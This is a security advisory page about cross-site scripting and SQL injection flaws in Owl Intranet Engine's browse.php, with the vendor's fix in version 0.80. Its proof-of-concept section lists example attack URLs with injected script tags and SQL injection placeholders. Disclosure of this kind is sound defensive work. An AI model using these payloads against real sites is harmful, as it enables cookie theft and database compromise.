Owl Intranet Engine Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
BID:12114
Info
Owl Intranet Engine Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
| Bugtraq ID: | 12114 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 26 2004 12:00AM |
| Updated: | Dec 26 2004 12:00AM |
| Credit: | Discovery is credited to Joxean Koret. |
| Vulnerable: |
Owl Owl Intranet Engine 0.73 Owl Owl Intranet Engine 0.72 Owl Owl Intranet Engine 0.71 Owl Owl Intranet Engine 0.7 Owl Owl Intranet Engine 0.6 |
| Not Vulnerable: |
Owl Owl Intranet Engine 0.80 |
Discussion
Owl Intranet Engine Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
Owl Intranet Engine is prone to multiple cross-site scripting and SQL injection vulnerabilities. The issues are reported to exist in the 'browse.php' script.
An attacker could exploit the cross-site scripting issues by enticing a victim user into following a malicious link that contains hostile HTML and script code. This could be exploited to steal cookie-based authentication credentials.
The SQL injection vulnerabilities could allow the attacker to influence the structure or logic of SQL queries made by the application. This could have various impacts, including compromise of the software, exposure and modification of sensitive information, or a potential for attacks against the database implementation itself.
The attacker may need to provide a valid session ID to exploit these issues.
Owl Intranet Engine is prone to multiple cross-site scripting and SQL injection vulnerabilities. The issues are reported to exist in the 'browse.php' script.
An attacker could exploit the cross-site scripting issues by enticing a victim user into following a malicious link that contains hostile HTML and script code. This could be exploited to steal cookie-based authentication credentials.
The SQL injection vulnerabilities could allow the attacker to influence the structure or logic of SQL queries made by the application. This could have various impacts, including compromise of the software, exposure and modification of sensitive information, or a potential for attacks against the database implementation itself.
The attacker may need to provide a valid session ID to exploit these issues.
Exploit / POC
Owl Intranet Engine Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
The following cross-site scripting examples were provided:
http://www.example.com/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=115&expand=1'><script>alert(document.location)
+</script>&order=creatorid&sortposted=DESC
http://www.example.com/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=115&expand=1&order=creatorid'><script>alert(do
+cument.location)</script>&sortposted=DESC
The following SQL injection examples were provided:
http://www.example.com/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=104
[SQL%20INJECTION]&expand=1&order=creatorid&sortposted=DESC
http://www.example.com/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=104&expand=1&order=creatorid&sortposted=DESC[SQL%20I
+NJECTION]
The following cross-site scripting examples were provided:
http://www.example.com/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=115&expand=1'><script>alert(document.location)
+</script>&order=creatorid&sortposted=DESC
http://www.example.com/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=115&expand=1&order=creatorid'><script>alert(do
+cument.location)</script>&sortposted=DESC
The following SQL injection examples were provided:
http://www.example.com/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=104
[SQL%20INJECTION]&expand=1&order=creatorid&sortposted=DESC
http://www.example.com/intranet/browse.php?sess=<replace-with-a-valid-session-id>&parent=104&expand=1&order=creatorid&sortposted=DESC[SQL%20I
+NJECTION]
Solution / Fix
Owl Intranet Engine Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
Solution:
The vendor has released Owl Intranet Engine 0.80 to address these issues. The 0.73 version in the CVS is not affected as well.
Owl Owl Intranet Engine 0.6
Owl Owl Intranet Engine 0.7
Owl Owl Intranet Engine 0.71
Owl Owl Intranet Engine 0.72
Owl Owl Intranet Engine 0.73
Solution:
The vendor has released Owl Intranet Engine 0.80 to address these issues. The 0.73 version in the CVS is not affected as well.
Owl Owl Intranet Engine 0.6
-
Owl Owl-0.80.tar.gz
http://prdownloads.sourceforge.net/owl/Owl-0.80.tar.gz?download
Owl Owl Intranet Engine 0.7
-
Owl Owl-0.80.tar.gz
http://prdownloads.sourceforge.net/owl/Owl-0.80.tar.gz?download
Owl Owl Intranet Engine 0.71
-
Owl Owl-0.80.tar.gz
http://prdownloads.sourceforge.net/owl/Owl-0.80.tar.gz?download
Owl Owl Intranet Engine 0.72
-
Owl Owl-0.80.tar.gz
http://prdownloads.sourceforge.net/owl/Owl-0.80.tar.gz?download
Owl Owl Intranet Engine 0.73
-
Owl Owl-0.80.tar.gz
http://prdownloads.sourceforge.net/owl/Owl-0.80.tar.gz?download
References
Owl Intranet Engine Multiple Cross-Site Scripting and SQL Injection Vulnerabilities
References:
References: